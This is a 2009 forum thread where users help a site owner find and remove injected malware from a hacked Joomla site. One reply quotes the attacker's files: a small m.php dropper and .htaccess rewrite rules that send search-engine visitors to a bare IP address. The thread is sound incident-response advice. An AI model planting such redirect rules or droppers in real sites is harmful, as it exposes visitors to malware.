Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.

dpw



812 posts

Ultimate Geek
+1 received by user: 13

Trusted

Topic # 30877 24-Feb-2009 14:59
Send private message

Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla - most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the site I created a few years ago has been compromised. There is now an obfuscated javascript snippet at the bottom of each page. I have no idea where this snippet is coming from but some AV software report it as Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through PhpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP enough to look further unfortunately.

I am posting it in this forum for lack of a more appropriate sounding one. Please folks - I'm sure there're some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.




Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

Create new topic
96 posts

Master Geek


  Reply # 197762 24-Feb-2009 15:41
Send private message

You have a problem, your website has been injected with yahoo counter script


look for the following line in your pages, which is begining of the script

script language=javascript><!-- Yahoo! Counter startsAlso I would recomend taking website down as it will infect your website wisitors.

there are a number of ways to fix it you can google "script language=javascript><!-- Yahoo! Counter starts"

What I would recomend is the following

1) Take the website down. (you can set it to offline in joomla)
2) copy all the files to your pc at home
3) run a search on all files for the script ( i think it mainly infects index.* and home.* and default.* files but i may be wrong on this one)
4) remove all the script injections from all the files(note wich files you have modified file names)
5)reupload the files back to the server
6)change the permission on files you modified above to 644

I hope this will help also if the files are executable like script files you may need to set them to 744



dpw



812 posts

Ultimate Geek
+1 received by user: 13

Trusted

  Reply # 197764 24-Feb-2009 15:53
Send private message

This is what's bugging me - I've searched with a couple of tools but nothing returned. I have taken the site down for now and yes, I already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.




Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

96 posts

Master Geek


  Reply # 197773 24-Feb-2009 16:44
Send private message

Yep if you running linux grep -R "Yahoo! Counter" * should do the job or even
grep -R "Yahoo" ./*

well earlyer I had a look at the source of your main page just by going view soece from firefox and i could see the script at the bottom.


who is your webhost?

also the other option is to do a diff between your files and a clean joomla download


also have a look at your webhosting folder for the following files

m.php

rename("ht",".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it

if you find them just rename them and see if it will fix your problem


dpw



812 posts

Ultimate Geek
+1 received by user: 13

Trusted

  Reply # 197820 24-Feb-2009 19:42
Send private message

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net





Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

96 posts

Master Geek


  Reply # 197874 24-Feb-2009 22:54
Send private message

no no no no do not create one as this is an example of a hacked one coz one of my joomla websites has been injected with javascript and that was one of the things i found during my investigation

57 posts

Master Geek
+1 received by user: 3

Trusted

  Reply # 198086 25-Feb-2009 20:54
Send private message

Hi

Can't be much help sorry, but if you have not already, then the Joomla security thread is a good read(for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist

...but in the spirit of TRYING to help, you might find some more info here(or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the headsup tho' I'm off to check my joomla sites.

Cheers

96 posts

Master Geek


  Reply # 198212 26-Feb-2009 13:11
Send private message

Here is the final solution which seems to fix this issue

1) Download your website to your computer
2) restore .htaccess file to the original one from the original install of if you not using it just delete it or delete everything from it.
3) Do a search througth your website files for the following code if(!function_exists(’tmp_lkojfghx’))…”).
The good program to do it is wingrep. This code can be in any file or can be as a separate file in in the website this post refering to to it was found in submenu-on1.gif file, this file was containg only one function.
4) remove that function from your code or remove the file if it is in a separate file.
5) reupload your new htaccess file and any other files you have modified.


that should fix it

good luck


dpw



812 posts

Ultimate Geek
+1 received by user: 13

Trusted

  Reply # 198215 26-Feb-2009 13:27
Send private message

casper021:

Here is the final solution which seems to fix this issue

1) Download your website to your computer
2) restore .htaccess file to the original one from the original install of if you not using it just delete it or delete everything from it.
3) Do a search througth your website files for the following code if(!function_exists(’tmp_lkojfghx’))…”).
The good program to do it is wingrep. This code can be in any file or can be as a separate file in in the website this post refering to to it was found in submenu-on1.gif file, this file was containg only one function.
4) remove that function from your code or remove the file if it is in a separate file.
5) reupload your new htaccess file and any other files you have modified.



Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-prefixed file gets executed though!

D.




Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

Create new topic

Twitter »

Follow us to receive Twitter updates when new discussions are posted in our forums:



Follow us to receive Twitter updates when news items and blogs are posted in our frontpage:



Follow us to receive Twitter updates when tech item prices are listed in our price comparison site:



Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.



Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.

Alternatively, you can receive a daily email with Geekzone updates.